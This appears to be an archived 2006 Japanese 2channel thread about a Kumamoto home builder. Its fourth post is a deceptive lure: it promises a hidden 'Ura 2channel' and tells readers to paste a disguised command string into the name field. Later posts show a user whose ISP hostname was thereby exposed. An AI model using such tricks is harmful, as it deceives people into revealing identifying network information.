2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

熊本のコンフォートハウス最高でした。

1 :(仮称)名無し邸新築工事:2006/12/13(水) 12:20:04 ID:???
コンフォートさんに、住宅を相談したところ、資金の相から、全て至れりつくせりでした
アントニオガゥディ風の事務所件住宅ができます。バツイチでも家が持てます。
又、社長がいい!!きっぷが良くて親身になってくださる所は地場ならではです

2 :(仮称)名無し邸新築工事:2006/12/13(水) 16:29:36 ID:???
ガウディ風って永遠に未完成と言うことか?

3 :(仮称)名無し邸新築工事:2006/12/15(金) 16:29:26 ID:W14THPen
一応あと何百年後に完成予定だったような?
いいのか?そんな家?
わからん

4 :(仮称)名無し邸新築工事:2006/12/16(土) 11:35:52 ID:???
裏2ちゃんねるに建築住宅業界の裏話が公開されました!!
欠陥住宅、建築中に倒産で放置された悲惨な現場や泥仕合の解約劇...などなど。
とても表では書けない真実の情報が満載です。

裏2ちゃんねるでは総力をあげて、蔓延るこの業界の問題を発いていきます。
非常に膨大な情報量が掲載されていますが接続時の簡単な操作でメ−カー別にアクセスできます。

★裏2ちゃんねるへの入り方
1.名前欄”に「&rf&rusi&ran&ras&ran/***」と入力します。
裏CGIへ飛ぶためのコマンドです、間違えないように”「」”の内側の文字をコピーペーストして下さい。
「***」の部分には最寄のサーバーの設置場所に置き換えて入力して下さい。 例:「&rf&rusi&ran&ras&ran/tky」
札幌→「spr」、仙台→「snd」、東京→「tky」、名古屋→「ngy」、大阪→「osk」、広島→「hrs」、福岡→「fko」

2.E-mail欄に、ご覧になりたいメーカー、会社名を入力します。(全部見たい場合は空白でもOKです。)
⇒分類された情報が表示されます。入力は半角ローマ字で。大文字でも小文字でも構いません。
(例:ひろゆきハウス→hiroyukihouse ひろゆきホーム→hiroyukihome)

3.本文にIDとパスワードのguest guest と入れて、書込みボタンを押します。

4.画面に「確認終了いたしました。ありがとうございます。」のメッセージが表示されれば準備完了。
10秒ほどで画面が遷移し、裏2ちゃんねるに自動的に接続されます。

5.サーバーの接続状況により2chに戻ってくることもありますが、ほとんどは5〜6回のチャレンジで接続でき
ます。

6.サーバートラフィックの都合上、専用線等の高速回線(企業や学校など)つながる確率が高いようですのでつながりにくい方はお試しください。
(注意!)全て半角で入力を

7.裏2ちゃんねるの内容については違法性、反社会的な内容を多く含んでおりますのでご自身で確認してください。


5 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:17:35 ID:zIw81DdZ
guest guest

6 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:19:08 ID:zIw81DdZ
guest guest

7 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:20:22 ID:zIw81DdZ
guest guest

8 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:20:52 ID:zIw81DdZ
guest guest

9 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:21:50 ID:zIw81DdZ
guest guest

10 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:29:31 ID:zIw81DdZ
guest guest

11 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 11:31:24 ID:zIw81DdZ
guest guest

12 :softbank220063020184.bbtec.net/fko」:2006/12/17(日) 16:34:40 ID:zIw81DdZ
guest guest

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)